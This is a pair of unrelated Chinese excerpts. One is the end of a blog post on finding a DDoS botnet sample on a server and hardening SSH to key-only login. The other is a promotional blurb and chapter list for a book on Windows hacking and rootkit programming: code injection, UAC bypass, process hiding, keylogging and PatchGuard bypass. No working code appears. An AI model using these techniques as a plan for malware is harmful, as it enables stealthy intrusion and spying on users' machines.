这也就是为什我这边的路由器会有高额的异常流量.下面是readelf的结果:正如 360 团队那篇文章所言:通过此样本可以发现黑产团队的 DDoS 攻击实力已经到了"比较娴熟"的地步, 而根据样本中不同部分的不同代码风格猜测黑产团队可能存在多人多团队合作的编程方式或"黑吃黑"的代码盗用情况可见现在的互联网攻击确实不容小觑, 必须时刻注意安全问题.事后解决方案在了解到了该病毒程序的主要功能之后, 自然是不能让它继续作恶了, 在和同事交流之后决定采用比较彻底的方式: 把相关的攻击细节备份留作警示后直接关闭这个 Vmware 的虚拟机, 然后新开一台虚拟机代替原来的, 新的服务器不采用 ssh 账号密码登录, 而是直接采用证书的形式访问. 也就是编辑/etc/ssh/sshd_config为:PasswordAuthentication no然后为服务器生成证书, 详细过程可以参考: 设置 SSH 通过密钥登录,一般而言密钥登录是不容易被攻破的. ...

《Windows黑客编程技术详解》面向对计算机系统安全开发感兴趣，或者希望提升安全开发水平的读者，以及从事恶意代码分析研究的安全人员。理论技术与实战操作相辅相成，凸显“道与术”庖丁解牛式剖析Windows用户层和内核层黑客技术原理代码兼容性高，支持Windows 7到Windows 10全平台系统近年来，全球大规模爆发勒索病毒和挖矿病毒，让沉寂许久的黑客技术，又重新回到了人们的视野中。Windows操作系统市场占有率高达90%以上，所以面对勒索病毒、挖矿病毒，Windows用户首当其冲。 为了揭开病毒木马的神秘面纱，更好地服务于信息安全，本书总结并剖析了常见的Windows黑客编程技术，用通俗易懂的语言介绍了用户层下的Windows编程和内核层下的Rootkit编程。内容简介《Windows黑客编程技术详解》介绍的是黑客编程的基础技术，涉及用户层下的Windows编程和内核层下的Rootkit编程。本书分为用户篇和内核篇两部分，用户篇包括11章，配套49个示例程序源码；内核篇包括7章，配套28个示例程序源码。本书介绍的每个技术都有详细的实现原理，以及对应的示例代码（配套代码均支持32位和64位Windows 7、Windows 8.1及Windows 10系统），旨在帮助初学者建立起黑客编程技术的基础。目录第1篇 用户篇第1章 开发环境 1.1 环境安装 1.2 工程项目设置 1.3 关于Debug模式和Release模式的小提示第2章 基础技术 2.1 运行单一实例 2.2 DLL延时加载 2.3 资源释放第3章 注入技术 3.1 全局钩子注入 3.2 远线程注入 3.3 突破SESSION 0隔离的远线程注入 3.4 APC注入第4章 启动技术 4.1 创建进程API 4.2 突破SESSION 0隔离创建用户进程 4.3内存直接加载运行第5章 自启动技术 5.1 注册表 5.2 快速启动目录 5.3 计划任务 5.4 系统服务第6章 提权技术 6.1 进程访问令牌权限提升 6.2 Bypass UAC第7章 隐藏技术 7.1 进程伪装 7.2傀儡进程 7.3 进程隐藏 7.4 DLL劫持第8章 压缩技术 8.1 数据压缩API 8.2 ZLIB压缩库第9章 加密技术 9.1 Windows自带的加密库 9.2 Crypto++密码库第10章 传输技术 10.1 Socket通信 10.2 FTP通信 10.3 HTTP通信 10.4 HTTPS通信第11章 功能技术 11.1 进程遍历 11.2 文件遍历 11.3 桌面截屏 11.4 按键记录 11.5 远程CMD 11.6 U盘监控 11.7 文件监控 11.8 自删除第2篇 内核篇第12章 开发环境 12.1 环境安装 12.2 驱动程序开发与调试 12.3 驱动无源码调试 12.4 32位和64位驱动开发第13章 文件管理技术 13.1 文件管理之内核API 13.2 文件管理之IRP 13.3 文件管理之NTFS解析第14章 注册表管理技术 14.1 注册表管理之内核API 14.2 注册表管理之HIVE文件解析第15章 HOOK技术 15.1 SSDT Hook 15.2过滤驱动第16章 监控技术 16.1 进程创建监控 16.2 模块加载监控 16.3 注册表监控 16.4 对象监控 16.5 Minifilter文件监控 16.6 WFP网络监控第17章 反监控技术 17.1 反进程创建监控 17.2 反线程创建监控 17.3 反模块加载监控 17.4 反注册表监控 17.5 反对象监控 17.6 反Minifilter文件监控第18章 功能技术 18.1 过PatchGuard的驱动隐藏 18.2 过PatchGuard的进程隐藏 18.3 TDI网络通信 18.4 强制结束进程 18.5 文件保护 18.6 文件强删附录 函数一览表书籍配套源码下载地址https://github.com/DemonGan/W…书籍购买链接天猫：https://detail.tmall.com/item…京东：https://item.jd.com/12464379….当当：http://product.dangdang.com/2… ...